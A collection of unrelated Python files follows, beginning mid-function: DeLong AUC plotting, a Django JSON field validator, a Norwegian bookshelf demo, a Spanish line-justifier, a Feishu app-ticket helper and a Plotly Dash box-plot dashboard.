    """DeLong AUC with its variance and a 95% confidence interval.

    Returns:
        [auc, auc_cov, ci] with ci clipped at 1 (AUC cannot exceed 1).
    """
    alpha = 0.95
    auc, auc_cov = delong_roc_variance(y_true, y_pred)
    auc_std = np.sqrt(auc_cov)
    # Two-sided normal quantiles for the chosen confidence level.
    quantiles = np.abs(np.array([0, 1]) - (1 - alpha) / 2)
    ci = stats.norm.ppf(quantiles, loc=auc, scale=auc_std)
    ci[ci > 1] = 1
    print('AUC:', auc)
    print('AUC COV:', auc_cov)
    print('95% AUC CI:', ci)
    return [auc, auc_cov, ci]
def plotDeLongCIs(testfiles,rcut,her2,model,feats_list,names_list,output_folder=None,suffix=''):
    """Plot DeLong AUC confidence intervals per feature set plus a p-value.

    NOTE: the p-value bracket compares the first two feature sets only, so
    `feats_list` is expected to have (at least) two entries.

    Fix vs. original: `plt.savefig` crashed with a TypeError when
    `output_folder` was None (its default); it is now guarded like in the
    sibling plotting functions.
    """
    plt.figure(figsize=(4,5))
    plt.plot([-0.5,len(names_list)],[0.5,0.5],':k')  # AUC=0.5 reference
    all_truths = []
    all_preds = []
    for i,feats in enumerate(feats_list):
        _,_,_,v = testBands(testfiles,'avg',rcut,her2,feats=feats,model=model)
        truths = v[0]
        preds = v[1]
        auc = getLimits(truths, preds)  # [auc, auc_cov, ci]
        plt.vlines(i, auc[2][0], auc[2][1])
        plt.plot(i, auc[0], 'ok', label=names_list[i], markersize=9)
        all_truths.append(truths)
        all_preds.append(preds)
    # DeLong test p-value between the first two feature sets.
    pval = delong_roc_test(all_truths[0], all_preds[0], all_preds[1])
    thepval = np.power(10,pval[0])[0]  # delong_roc_test returns log10(p)
    print(thepval)
    # Significance bracket between columns 0 and 1.
    x1, x2 = 0, 1
    y, h, col = 1.01, 0.02, 'k'
    plt.plot([x1, x1, x2, x2], [y, y+h, y+h, y], lw=1.5, c=col)
    plt.text((x1+x2)*.5, y+h, 'p={:.2f}'.format(thepval), ha='center', va='bottom', color=col)
    plt.ylabel('AUC')
    plt.xlim([-0.5,len(names_list)-0.5])
    plt.text(0.55,0.51,'AUC=0.5',size=13)
    plt.xticks(range(len(names_list)),names_list,rotation=85)
    if output_folder is not None:
        plt.savefig(output_folder+'/delong_her2{}{}.pdf'.format(her2,suffix), bbox_inches='tight', transparent=True)
    plt.show()
|
from django.apps import apps
from django.db.models.base import ModelBase
from .exceptions import (
JSONFieldModelTypeError,
JSONFieldModelError,
JSONFieldValueError
)
class JSONField:
    """Declarative validator for one key of a JSON payload.

    A field coerces incoming values with ``field_type`` and can optionally
    reference a Django model (``model``/``field``) resolved via the app
    registry.
    """
    # Allowed coercion targets for field_type.
    types = (int, float, str, bool)

    def __init__(self, field_type=None, required=False, default=None,
                 blank=True, model=None, field=''):
        # NOTE(review): the default field_type=None always fails this check,
        # so a bare JSONField() raises — confirm that is intended (the
        # concrete subclasses below always supply a type).
        if field_type not in self.types:
            raise JSONFieldValueError('field_type should be one of: {}'.format(
                str(self.types).replace("<class '", '').replace("'>", '')))
        self.field_type = field_type
        # A non-blank field is implicitly required.
        self.required = required or (not blank)
        self.default = default
        self.blank = blank
        self.key = ''  # set later, by validate()
        self.model = self._set_model(model)
        self.field = field
        if model and not field:
            self.field = 'id'  # fall back to the model's primary key
        # if not self.var_type:
        #     raise ValueError('var_type should be specified')

    def check_type(self, value):
        """Coerce *value* with field_type; return (coerced_or_None, messages).

        NOTE(review): coercion inherits builtin quirks — str(None) yields
        the string 'None' and bool('False') is True — confirm acceptable.
        """
        messages = []
        try:
            _value = self.field_type(value)
        except (TypeError, ValueError):
            messages.append('Could not treat {} value `{}` as {}'.format(
                self.key or '', value, self.field_type))
            _value = None
        return _value, messages

    def validate(self, key, value):
        """Validate *value* for *key*; return (value_or_None, messages).

        Side effect: stores *key* on the instance so check_type can use it
        in error messages.
        """
        self.key = key
        messages = []
        if self.required and (value is None):
            messages.append('`{}` value is required'.format(key))
        else:
            if not self.blank and value == '':
                messages.append('`{}` value blank is not allowed'.format(key))
            elif (self.default is not None) and (value is None):
                value = self.default
        if messages:
            value = None
        else:
            value, msg = self.check_type(value)
            messages += msg
        return value, messages

    @staticmethod
    def _set_model(model):
        """Resolve *model*: a ModelBase, an '<app>.<Model>' string, or falsy.

        Raises:
            JSONFieldModelError: string does not resolve to a model.
            JSONFieldModelTypeError: any other type was passed.
        """
        if not model:
            return None
        elif isinstance(model, ModelBase):
            return model
        elif isinstance(model, str):
            try:
                app, _model = model.split('.')
                model = apps.get_model(app, _model)
            except (ValueError, LookupError):
                raise JSONFieldModelError('model name does not match pattern '
                                          '<application>.<Model> or model '
                                          'does not exist')
            return model
        else:
            raise JSONFieldModelTypeError('wrong model type (NoneType, string '
                                          'or ModelBase allowed)')
class String(JSONField):
    """JSON field coerced and validated as ``str``."""
    def __init__(self, required=False, default=None,
                 blank=True, model=None, field=''):
        options = dict(required=required, default=default,
                       blank=blank, model=model, field=field)
        super().__init__(field_type=str, **options)


class Int(JSONField):
    """JSON field coerced and validated as ``int``."""
    def __init__(self, required=False, default=None,
                 blank=True, model=None, field=''):
        options = dict(required=required, default=default,
                       blank=blank, model=model, field=field)
        super().__init__(field_type=int, **options)


class Float(JSONField):
    """JSON field coerced and validated as ``float``."""
    def __init__(self, required=False, default=None,
                 blank=True, model=None, field=''):
        options = dict(required=required, default=default,
                       blank=blank, model=model, field=field)
        super().__init__(field_type=float, **options)


class Bool(JSONField):
    """JSON field coerced and validated as ``bool``."""
    def __init__(self, required=False, default=None,
                 blank=True, model=None, field=''):
        options = dict(required=required, default=default,
                       blank=blank, model=model, field=field)
        super().__init__(field_type=bool, **options)
|
class Bok:
    """A single book: title, author and publication year."""

    def __init__(self, navn, forfatter, aar):
        self._navn, self._forfatter, self._aar = navn, forfatter, aar

    def hentNavn(self):
        """Return the book title."""
        return self._navn

    def hentAar(self):
        """Return the publication year."""
        return self._aar

    def printBok(self):
        """Print a one-line description (labels kept verbatim in Norwegian)."""
        print("Navnet på boken: ", self._navn, "Forfatteren: ", self._forfatter, "Utgivelsesår: ", self._aar)
class Bokhylle:
    """A bookshelf that holds at most `maksplass` books."""

    def __init__(self, maksplass):
        self._maksplass = maksplass
        self._listeBoker = []

    def leggTilBok(self, enBok):
        """Add a book if there is room; return True on success."""
        if not self.erDetPlass():
            return False
        self._listeBoker.append(enBok)
        return True

    def erDetPlass(self):
        """Return True while the shelf is below capacity."""
        return len(self._listeBoker) < self._maksplass

    def finnBok(self, navn, aar):
        """Return the first book matching title and year, else False."""
        for bok in self._listeBoker:
            if bok.hentNavn() == navn and bok.hentAar() == aar:
                return bok
        return False

    def printBokhylle(self):
        """Print every book on the shelf."""
        for bok in self._listeBoker:
            bok.printBok()
# Demo: put two books on a 7-slot shelf and list them.
bokhylle = Bokhylle(7)
bok1 = Bok("Versace", "Harald", 1976)
bok2 = Bok("Swag", "Meg", 3005)
for bok in (bok1, bok2):
    bokhylle.leggTilBok(bok)
bokhylle.printBokhylle()
|
def justficador(linea):
    """Print *linea* justified into 30-character lines.

    Long strings are split into consecutive 30-character chunks; the final
    (or any short) line is right-padded with spaces to width 30.

    Fixes vs. original: the `while len(linea) > 30: linea += ' '` loop never
    terminated (padding makes the string longer), the recursive call used a
    differently spelled name (`justificador` — NameError), the `elif`
    referenced an undefined `line`, and `linea[30] += '\\n'` is invalid on
    an immutable str. The intent is reconstructed from the example calls.
    """
    ancho = 30
    if len(linea) > ancho:
        print(linea[:ancho])
        justficador(linea[ancho:])  # justify the remainder recursively
    else:
        print(linea.ljust(ancho))
# Demo call; note that with the original (buggy) implementation this call
# never terminated for inputs longer than 30 characters.
justficador("Esta es una cadena de texto de ejemplo de unos 60 caracteres")
# justficador("Cadenita de tan sólo 32 símbolos")
# justficador('hola')
#justficador('Cadena de tan sólo 30 símbolos')
# -*- coding: utf-8 -*-
from .basetoken import BaseToken
class AppTicket(BaseToken):
    """Feishu/Lark ``app_ticket`` helper built on BaseToken."""

    def __init__(self, appid=None, secret=None):
        super(AppTicket, self).__init__(appid=appid, secret=secret)
        # Re-push the app_ticket. Refer: https://open.feishu.cn/document/ukTMukTMukTM/uQjNz4CN2MjL0YzM
        self.APP_TICKET_RESEND = self.OPEN_DOMAIN + '/open-apis/auth/v3/app_ticket/resend/'

    def resend(self, appid=None, secret=None):
        """Ask the platform to re-deliver the app_ticket; credentials default
        to those configured on the instance."""
        return self.post(self.APP_TICKET_RESEND, data={
            'app_id': appid or self.appid,
            'app_secret': secret or self.secret,
        })
# Module-level singleton plus a convenience alias for its resend method.
app_ticket = AppTicket()
app_ticket_resend = app_ticket.resend
|
# IMPORT LIBRARIES
import plotly.graph_objs as go
import dash
import dash_bootstrap_components as dbc
import dash_html_components as html
import dash_core_components as dcc
import dash_daq as daq
from dash.dependencies import Input, Output, State
import pandas as pd
import numpy as np
import colorlover as cl
# INITIAL VARIABLES
# --- UI sizing / theming defaults used throughout the layout below ---
button_font_size='1.2em'
cardbody_font_size='1em'
cardheader_color='info'
cardbody_color='info'
main_panel_margin={'margin': '10px 0px'}
left_panel_margin={'width': '25%'}
right_panel_margin={'class': 'col-md-8', 'display':'block-inline'}
toggle_switch_color='#91c153'
# Plotly line-dash styles and marker symbols offered in the UI.
line_style = ['Solid', 'Dash', 'Dot', 'Long Dash', 'Dash Dot', 'Long Dash Dot']
marker_symbols = ['Circle', 'Square', 'Diamond', 'Cross', 'X', 'Triangle-Up', 'Pentagon', 'Hexagon', 'Star']
# Opacity defaults: box fills are translucent, percentile symbols opaque.
default_alpha = 0.65
default_symbol_alpha = 1
# Per-box colors chosen by the user, keyed by box name.
box_color_saved = {}
# 5-color qualitative palette (colorlover) for percentile markers.
percentile_color_saved = cl.to_rgb(cl.scales[str('5')]['qual']['Dark2'])
num_of_color=9
default_color = cl.to_rgb(cl.scales[str(num_of_color)]['qual']['Set1'])
# Last user-chosen tick step; restored when leaving logarithmic mode.
dtick_value = None
# Initialising selected marker symbol
selected_marker_symbols = ['diamond', 'cross', 'triangle-up', 'star', 'x']
# Helper factored out of two previously-duplicated conversion loops:
# rewrite a colorlover 'rgb(r,g,b)' string as 'rgba(r,g,b,<alpha>)'.
def _with_alpha(rgb_color, alpha):
    start_idx = rgb_color.find('(')
    channels = rgb_color[start_idx+1:len(rgb_color)-1].split(",")
    return 'rgba({},{},{},{})'.format(channels[0], channels[1], channels[2], alpha)

# generate default colors list (box fills use the translucent default alpha)
default_color = [_with_alpha(c, default_alpha) for c in default_color]
# percentile marker colors use the opaque symbol alpha
percentile_color_saved = [_with_alpha(c, default_symbol_alpha) for c in percentile_color_saved]
# FUNCTIONS GOES HERE
# Function: Reading file
# Input: file name
# Output: data frame
def read_file(filename):
    """Read a CSV or Excel file into a DataFrame.

    Args:
        filename: path whose name contains 'csv' or 'xls'/'xlsx'.

    Returns:
        pandas.DataFrame on success, or an error-message string on failure.
    """
    try:
        if 'csv' in filename:
            dff = pd.read_csv(filename)
        # Fix vs. original: `('xls' or 'xlsx') in filename` only ever tested
        # 'xls'; check both explicitly ('xlsx' also contains 'xls').
        elif 'xls' in filename or 'xlsx' in filename:
            dff = pd.read_excel(filename)
        else:
            # Fix vs. original: an unsupported extension left `dff` unbound
            # and raised UnboundLocalError; report it like other failures.
            return u'There was an error opening {}'.format(filename)
    except Exception as e:
        print(e)
        return u'There was an error opening {}'.format(filename)
    return dff
# Function: Render drop down list
# Input: id, [options]
# Output: dcc.Dropdown
def render_dropdown(id, options):
    """Dropdown whose option labels and values are the items themselves."""
    opts = [{'label': opt, 'value': opt} for opt in options]
    return dcc.Dropdown(id=id, options=opts, className='card h-100')
# Function: Render drop down list without any options
# Input: id
# Output: dcc.Dropdown
def render_dropdown_blank(id):
    """Empty dropdown; options are filled in later by callbacks."""
    return dcc.Dropdown(id=id)
# Function: Render drop down list with selected value
# Input: id, [options], value
# Output: dcc.Dropdown
def render_dropdown_valued(id, options, value):
    """Dropdown with an initial selection."""
    opts = [{'label': opt, 'value': opt} for opt in options]
    return dcc.Dropdown(id=id, options=opts, value=value, className='card h-100')
# Function: Render drop down list with label formatting (remove space between words and turn to lower case)
# Input: id, [options]
# Output: dcc.Dropdown
def render_dropdown_format(id, options):
    """Dropdown whose values are the labels lower-cased with spaces removed."""
    opts = [{'label': opt, 'value': opt.replace(" ", "").lower()} for opt in options]
    return dcc.Dropdown(id=id, options=opts, className='card h-100')
# Function: Render radio items
# Input: id, [options]
# Output: dcc.RadioItems
def render_radio(id, options):
    """Radio list defaulting to the first option."""
    opts = [{'label': opt, 'value': opt} for opt in options]
    return dcc.RadioItems(id=id, options=opts, value=str(options[0]),
                          labelStyle={'display': 'block'})
# Function: Render radio items for data points and outlies
# Input: id
# Output: dcc.RadioItems
def render_radio_outliers(id):
    """Radio list of the plotly boxplot outlier-display modes."""
    outlier_modes = [
        ('Default', 'outliers'),
        ('Only Wiskers', 'False'),
        ('Suspected Outliers', 'suspectedoutliers'),
        ('All Points', 'all'),
    ]
    return dcc.RadioItems(
        id=id,
        options=[{'label': lab, 'value': val} for lab, val in outlier_modes],
        value='outliers',
        labelStyle={'display': 'block'})
# Function: Render radio items contain id only
# Input: id
# Output: dcc.RadioItems
def render_radio_blank(id):
    """Radio list with no options; populated later by callbacks."""
    return dcc.RadioItems(id=id, labelStyle={'display': 'block'})
# Function: Render radio items with label formatting (remove space between words and turn to lower case)
# Input: id, [options]
# Output: dcc.RadioItems
def render_radio_format(id, options):
    """Radio list whose values are the labels lower-cased with spaces removed."""
    return dcc.RadioItems(
        id=id,
        options=[{'label': opt, 'value': opt.replace(" ", "").lower()} for opt in options],
        value=str(options[0]).replace(" ", "").lower(),
        labelStyle={'display': 'block'})
# Function: Render text input
# Input: id, placeholder
# Output: dcc.Input
def render_input(id, placeholder):
    """Free-text input stretched to the full card width."""
    full_width = {'width': '100%'}
    return dcc.Input(id=id, type='text', placeholder=placeholder, style=full_width)
# Function: Render number input
# Input: id, placeholder
# Output: dcc.Input
def render_input_number(id, placeholder):
    """Non-negative numeric input stretched to the full card width."""
    full_width = {'width': '100%'}
    return dcc.Input(id=id, type='number', min=0, placeholder=placeholder, style=full_width)
# Function: Render text input with delay feature, will callback after enter key pressed or input area loss its focus
# Input: id, placeholder
# Output: dcc.Input
def render_input_delay(id, placeholder):
    """Debounced text input: fires on Enter or blur instead of per keystroke."""
    full_width = {'width': '100%'}
    return dcc.Input(id=id, type='text', placeholder=placeholder, debounce=True, style=full_width)
# Function: Render toggle switch
# Input: id, [labels], value
# Output: daq.ToggleSwitch
def render_toggleswitch(id, labels, value):
    """Two-state toggle with a label on either side."""
    return daq.ToggleSwitch(id=id, label=labels, value=value, color=toggle_switch_color)
# Function: Render boolean switch
# Input: id, label, on
# Output: daq.BooleanSwitch
def render_booleanswitch(id, label, on):
    """On/off switch with its label above."""
    return daq.BooleanSwitch(id=id, label=label, on=on, labelPosition='top', color=toggle_switch_color)
# Function: Render boolean switch without label
# Input: id, on
# Output: daq.BooleanSwitch
def render_booleanswitch_nolab(id, on):
    """On/off switch with no label."""
    return daq.BooleanSwitch(id=id, on=on, color=toggle_switch_color)
# Function: Render slider
# Input: id, min, max, value, step, [marks]
# Output: daq.Slider
def render_slider(id, min, max, value, step, marks):
    """Slider whose tick marks label themselves with their own value."""
    mark_labels = {m: str(m) for m in marks}
    return daq.Slider(id=id, min=min, max=max, value=value, step=step, marks=mark_labels)
# Function: Render Range slider
# Input: id, min, max, [value], step, {marks}
# Output: dcc.RangeSlider
def render_range_slider(id, min, max, value, step, marks):
    """Two-handle range slider."""
    return dcc.RangeSlider(id=id, min=min, max=max, value=value, step=step, marks=marks)
# Function: Render color picker
# Input: id, color, r, g, b, a
# Output: daq.ColorPicker
def render_colorpicker(id, color, r, g, b, a):
    """RGBA color picker initialised to the given channels.

    Note: the `color` parameter is unused; kept for interface compatibility.
    """
    initial = dict(rgb=dict(r=r, g=g, b=b, a=a))
    return daq.ColorPicker(id=id, value=initial)
# Function: Render numeric Input
# Input: id, min, max, value
# Output: daq.NumericInput
def render_numinput(id, min, max, value):
    """Bounded numeric spinner."""
    return daq.NumericInput(id=id, min=min, max=max, value=value)
# MAIN APP HERE
# Loading Data
file_name = 'data3.xlsx'
# NOTE(review): read_file returns an error *string* on failure, in which
# case the select_dtypes calls below would raise — confirm the file exists.
df = read_file(file_name)
# Loading Numeric Data from Dataframe
# Please be aware with categoric data stored in numeric data
# example: gender variable coded by 1 and 2, this feature will
# fall into numeric data instead of categoric.
# proposed solution: modify file by recode to alphabetic
# (ex: recode 1 = m and 2 = f)
features = df.select_dtypes(include='number').columns.values
# Loading non-Numeric Data from Dataframe
cat_features = df.select_dtypes(exclude=['number', 'datetime', 'datetime64']).columns.values
# Loading datetime from Dataframe
datetime_feature = df.select_dtypes(include=['datetime', 'datetime64']).columns.values
if datetime_feature.shape[0]==0:
    # No datetime column: the time-range card is hidden in the layout.
    df_no_time=True
else:
    print('have a time')
    df_no_time=False
    # Slider units are months since January of the first year.
    dt_min=df[datetime_feature[0]].min()
    dt_max=df[datetime_feature[0]].max()
    dt_range=((dt_max.year + 1) - dt_min.year)*12
    # Generate date time slider marks
    dt_slider_marks = {}
    for i in range(0, dt_range+1):
        if i % 12 == 0:
            # One mark per year boundary.
            dt_slider_marks[i]=str(dt_min.year + (i//12))
## MAIN APP HERE
app = dash.Dash(__name__)
# Page layout: a left accordion of option cards (col-md-3) and the box plot
# plus an optional time-range card on the right (col-md-9).
app.layout=html.Div(className='row', children=[
    html.Div(children=[
        html.Div(className='container', children=[
            html.Div(className='accordion', children=[
                # Card 1: choose the plotted variable and the grouping column.
                dbc.Card([
                    dbc.CardHeader(
                        dbc.Button("Select Data", id='group-1-toggle', color=cardheader_color, style={'font-size': button_font_size}, block=True,
                        )
                    ),
                    dbc.Collapse(
                        dbc.CardBody(children=[
                            dbc.Card([
                                dbc.CardHeader(html.H5('Variable')),
                                dbc.CardBody(children=render_dropdown_valued('select-variable', features, features[0]))
                            ], className='col-md-6', style={'margin': '0px 0px 10px 0px', 'height': '30em'}
                            ),
                            dbc.Card([
                                dbc.CardHeader(html.H5('Group by')),
                                dbc.CardBody(children=render_dropdown_valued('select-groupby', cat_features, cat_features[0]))
                            ], className='col-md-6', style={'margin': '0px 0px 10px 0px', 'height': '30em'}
                            )
                        ]),
                        id='collapse-1'
                    ),
                ], color=cardbody_color, outline=True, style={'font-size': cardbody_font_size} ),
                # Card 3: general plot settings (orientation, legend, grid, ticks).
                dbc.Card([
                    dbc.CardHeader(
                        dbc.Button(
                            "Plot Setting", id='group-3-toggle', color=cardheader_color, style={'font-size': button_font_size}, block=True,
                        )
                    ),
                    dbc.Collapse(
                        dbc.CardBody(children=[
                            dbc.Card([
                                dbc.CardHeader(html.H5('Graph Orientation')),
                                dbc.CardBody(children=render_toggleswitch('graph-alignment', ['Vertical', 'Horizontal'], False))
                            ], style={'margin': '0px 0px 10px 0px'}
                            ),
                            dbc.Card([
                                dbc.CardHeader(html.H5('Legend')),
                                dbc.CardBody(children=render_booleanswitch_nolab('show-legend', True))
                            ], className='col-md-6', style={'margin': '0px 0px 10px 0px'}
                            ),
                            dbc.Card([
                                dbc.CardHeader(html.H5('Grid Lines')),
                                dbc.CardBody(children=render_booleanswitch_nolab('show-gridlines', True))
                            ], className='col-md-6', style={'margin': '0px 0px 10px 0px'}
                            ),
                            dbc.Card([
                                dbc.CardHeader(html.H5('X Zero Line')),
                                dbc.CardBody(children=render_booleanswitch_nolab('show-zeroline-x', True))
                            ], className='col-md-6', style={'margin': '0px 0px 10px 0px'}
                            ),
                            dbc.Card([
                                dbc.CardHeader(html.H5('Y Zero Line')),
                                dbc.CardBody(children=render_booleanswitch_nolab('show-zeroline-y', True))
                            ], className='col-md-6', style={'margin': '0px 0px 10px 0px'}
                            ),
                            dbc.Card([
                                dbc.CardHeader(html.H5('Grid Width')),
                                dbc.CardBody(children=render_numinput('grid-width', 1, 5, 1))
                            ], className='col-md-6', style={'margin': '0px 0px 10px 0px'}
                            ),
                            dbc.Card([
                                dbc.CardHeader(html.H5('Tick Step')),
                                dbc.CardBody(children=render_input_number('delta-tick', 'Tick Step'))
                            ], className='col-md-6', style={'margin': '0px 0px 10px 0px'}
                            ),
                        ]),
                        id='collapse-3'
                    ),
                ], color='info', outline=True, style={'font-size': cardbody_font_size} ),
                # Card 4: statistics overlays (transform, outliers, mean/sd, stats).
                dbc.Card([
                    dbc.CardHeader(
                        dbc.Button(
                            "Statistic Information", id='group-4-toggle', color=cardheader_color, style={'font-size': button_font_size}, block=True,
                        )
                    ),
                    dbc.Collapse(
                        dbc.CardBody(children=[
                            dbc.Card([
                                dbc.CardHeader(html.H5('Data Transformation')),
                                dbc.CardBody(children=render_toggleswitch('data-transform', ['Linear', 'Logarithmic'], False))
                            ], style={'margin': '0px 0px 10px 0px'}
                            ),
                            dbc.Card([
                                dbc.CardHeader(html.H5('Boxplot type')),
                                dbc.CardBody(children=render_radio_outliers('select-outliers'))
                            ], className='col-md-6', style={'margin': '0px 0px 10px 0px'}
                            ),
                            dbc.Card([
                                dbc.CardHeader(html.H5('Frequency')),
                                dbc.CardBody(children=render_booleanswitch_nolab('show-ndata', True))
                            ], className='col-md-6', style={'margin': '0px 0px 10px 0px'}
                            ),
                            dbc.Card([
                                dbc.CardHeader(html.H5('Mean')),
                                dbc.CardBody(children=render_booleanswitch_nolab('show-mean', False))
                            ], className='col-md-6', style={'margin': '0px 0px 10px 0px'}
                            ),
                            dbc.Card([
                                dbc.CardHeader(html.H5('Std. Dev.')),
                                dbc.CardBody(children=render_booleanswitch_nolab('show-sd', False))
                            ], className='col-md-6', style={'margin': '0px 0px 10px 0px'}
                            ),
                            dbc.Card([
                                dbc.CardHeader(html.H5('Summary Stats')),
                                dbc.CardBody(children=render_booleanswitch_nolab('show-stats', False))
                            ], className='col-md-6', style={'margin': '0px 0px 10px 0px'}
                            ),
                        ]),
                        id='collapse-4'
                    ),
                ], color=cardbody_color, outline=True, style={'font-size': cardbody_font_size} ),
                # Card 7: percentile markers (which percentile, symbol, size, color).
                dbc.Card([
                    dbc.CardHeader(
                        dbc.Button(
                            "Percentiles", id='group-7-toggle', color=cardheader_color, style={'font-size': button_font_size}, block=True,
                        )
                    ),
                    dbc.Collapse(
                        dbc.CardBody(children=[
                            dbc.Card([
                                dbc.CardHeader(html.H5('Show Percentiles')),
                                dbc.CardBody(children=render_booleanswitch_nolab('show-percentiles', False))
                            ], style={'margin': '0px 0px 10px 0px'}
                            ),
                            dbc.Card([
                                dbc.CardHeader(html.H5('Percentile')),
                                dbc.CardBody(children=render_dropdown('select-percentile', ['5%', '10%', '90%', '95%']))
                            ], style={'margin': '0px 0px 10px 0px'}
                            ),
                            dbc.Card([
                                dbc.CardHeader(html.H5('Marker Symbol')),
                                dbc.CardBody(children=render_dropdown_format('marker-symbol', marker_symbols))
                            ], style={'margin': '0px 0px 10px 0px'}
                            ),
                            dbc.Card([
                                dbc.CardHeader(html.H5('Symbol Size'), className='card w-100'),
                                dbc.CardBody(children=render_numinput('symbol-size', 1, 15, 8))
                            ], style={'margin': '0px 0px 10px 0px'}
                            ),
                            dbc.Card([
                                dbc.CardHeader(html.H5('Color')),
                                dbc.CardBody(children=render_colorpicker('select-percentile-color', 'white', 100, 200, 255, 0.65))
                            ],
                            ),
                        ]),
                        id='collapse-7'
                    ),
                ], color=cardbody_color, outline=True, style={'font-size': cardbody_font_size} ),
                # Card 5: horizontal threshold line (value, size, style, color).
                dbc.Card([
                    dbc.CardHeader(
                        dbc.Button(
                            "Threshold Setting", id='group-5-toggle', color=cardheader_color, style={'font-size': button_font_size}, block=True,
                        )
                    ),
                    dbc.Collapse(
                        dbc.CardBody(children=[
                            dbc.Card([
                                dbc.CardHeader(html.H5('Threshold')),
                                dbc.CardBody(children=render_booleanswitch_nolab('show-treshold', False))
                            ], style={'margin': '0px 0px 10px 0px'}
                            ),
                            dbc.Card([
                                dbc.CardHeader(html.H5('Value')),
                                dbc.CardBody(children=render_input('treshold-value', 'Threshold Value'))
                            ], className='col-md-6'
                            ),
                            dbc.Card([
                                dbc.CardHeader(html.H5('Line Size')),
                                dbc.CardBody(children=render_numinput('treshold-line-size', 1, 10, 2))
                            ], className='col-md-6', style={'margin': '0px 0px 10px 0px'}
                            ),
                            dbc.Card([
                                dbc.CardHeader(html.H5('Line Style')),
                                dbc.CardBody(children=render_dropdown_format('treshold-style', line_style))
                            ], style={'margin': '0px 0px 10px 0px'}
                            ),
                            dbc.Card([
                                dbc.CardHeader(html.H5('Line Color')),
                                dbc.CardBody(children=render_colorpicker('treshold-line-color', 'white', 0, 0, 255, 1))
                            ], style={'margin': '0px 0px 10px 0px'}
                            ),
                        ]),
                        id='collapse-5'
                    ),
                ], color=cardbody_color, outline=True, style={'font-size': cardbody_font_size} ),
                # Card 6: per-box fill color selection.
                dbc.Card([
                    dbc.CardHeader(
                        dbc.Button(
                            "Box Color", id='group-6-toggle', color=cardheader_color, style={'font-size': button_font_size}, block=True,
                        )
                    ),
                    dbc.Collapse(
                        dbc.CardBody(children=[
                            dbc.Card([
                                dbc.CardHeader(html.H5('Fill')),
                                dbc.CardBody(children=render_toggleswitch('box-color-fill', ['Transparent', 'Colored'], True))
                            ], style={'margin': '0px 0px 10px 0px'}
                            ),
                            dbc.Card([
                                dbc.CardHeader(html.H5('Select Box'), className='card w-100'),
                                dbc.CardBody(children=render_dropdown_blank('select-box'))
                            ], style={'margin': '0px 0px 10px 0px'}
                            ),
                            dbc.Card([
                                dbc.CardHeader(html.H5('Color')),
                                dbc.CardBody(children=render_colorpicker('box-color', 'white', 0, 0, 255, 0.65))
                            ],
                            ),
                        ]),
                        id='collapse-6'
                    ),
                ], color=cardbody_color, outline=True, style={'font-size': cardbody_font_size} ),
                # Card 2: overall graph height/width sliders.
                dbc.Card([
                    dbc.CardHeader(
                        dbc.Button("Graph Size", id='group-2-toggle', color=cardheader_color, style={'font-size': button_font_size}, block=True,
                        )
                    ),
                    dbc.Collapse(
                        dbc.CardBody(children=[
                            dbc.Card([
                                dbc.CardHeader(html.H5('Graph Height')),
                                dbc.CardBody(children=render_slider('graph-height', 600, 1200, 600, 50, [600, 700, 800, 900, 1000, 1100, 1200]), style={'padding':'5% 5% 10% 5%'})
                            ], style={'width': '100%'}
                            ),
                            dbc.Card([
                                dbc.CardHeader(html.H5('Graph Width')),
                                dbc.CardBody(children=render_slider('graph-width', 800, 1400, 800, 50, [800, 900, 1000, 1100, 1200, 1300, 1400]), style={'padding':'5% 5% 10% 5%'})
                            ], style={'width': '100%'}
                            ),
                        ]),
                        id='collapse-2'
                    ),
                ], color=cardbody_color, outline=True, style={'font-size': cardbody_font_size} ),
            ])
        ])
    ], className='col-md-3'
    ),
    # Right panel: the box plot itself plus the (optionally hidden) time card.
    html.Div(children=[
        dbc.Row(children=[
            dcc.Graph(id='box-plot',
                      style={'width' : '90%', 'padding-left' : '3%'},
                      config={'editable' : True, 'toImageButtonOptions': {'scale' : 10},'edits' : {'titleText': True}},
                      ),
        ],
        ),
        dbc.Row(children=[
            # Hidden entirely when the data has no datetime column.
            html.Div(id='time-msg-card', children=[
                dbc.Card([
                    dbc.CardHeader(html.H5('Select Time Range')),
                    dbc.CardBody(children=render_range_slider('time-range-slider', 0, 0 if df_no_time else dt_range, [0, 0 if df_no_time else dt_range], 1, {} if df_no_time else dt_slider_marks), style={'padding':'2% 2% 4% 2%'}),
                    dbc.CardFooter(id='time-range-msg'),
                ], style={'width': '100%', 'font-size': cardbody_font_size, 'display': 'none' if df_no_time else 'block'}, color=cardbody_color, outline=True,
                ),
            ], style={'width': '90%', 'margin': '2%'}
            ),
        ]),
    ], className='col-md-9'
    ),
], style=main_panel_margin)
# CALLBACK GOES HERE
# Accordion Toggle Callback
@app.callback(
    [Output(f'collapse-{i}', 'is_open') for i in range(1,8)],
    [Input(f'group-{i}-toggle', 'n_clicks') for i in range(1,8)],
    [State(f'collapse-{i}', 'is_open') for i in range(1,8)]
)
def toggle_accordion(n1, n2, n3, n4, n5, n6, n7, is_open1, is_open2, is_open3, is_open4, is_open5, is_open6, is_open7):
    """Open the clicked accordion section and collapse all the others.

    Returns one boolean per 'collapse-{1..7}' Output.
    """
    ctx = dash.callback_context
    if not ctx.triggered:
        # Fix vs. original: it returned "" here, which does not match the
        # callback's 7 Outputs and makes Dash raise an invalid-return error
        # on the initial call. Keep every section closed instead.
        return (False,) * 7
    button_id = ctx.triggered[0]['prop_id'].split('.')[0]
    clicks = (n1, n2, n3, n4, n5, n6, n7)
    states = (is_open1, is_open2, is_open3, is_open4, is_open5, is_open6, is_open7)
    # Single loop replaces the previous 7-branch if/elif chain.
    for idx in range(7):
        if button_id == 'group-{}-toggle'.format(idx + 1) and clicks[idx]:
            result = [False] * 7
            result[idx] = not states[idx]
            return tuple(result)
    return (False,) * 7
# Update time range message
@app.callback(
    Output('time-range-msg', 'children'),
    [Input('time-range-slider', 'value'), ]
)
def update_time_range_msg(dt_range_slider):
    """Render the "Time range from M/Y to M/Y" footer for the slider.

    ``dt_range_slider`` is a ``[start, end]`` pair of month offsets from
    ``dt_min``.  Fixed: the original added the raw offset to
    ``dt_min.month`` (which can exceed 12) and computed the end month with
    a different formula than the start month; both endpoints now use the
    same normalised conversion.
    """
    if not df_no_time:
        from_year, from_month = _offset_to_year_month(dt_min, dt_range_slider[0])
        to_year, to_month = _offset_to_year_month(dt_min, dt_range_slider[1])
        return html.H5('Time range from {}/{} to {}/{}'.format(from_month, from_year, to_month, to_year))
    else:
        return None


def _offset_to_year_month(base, offset):
    """Map a month *offset* from *base* (a date/datetime) to (year, month)."""
    total = base.year * 12 + (base.month - 1) + offset
    return total // 12, total % 12 + 1
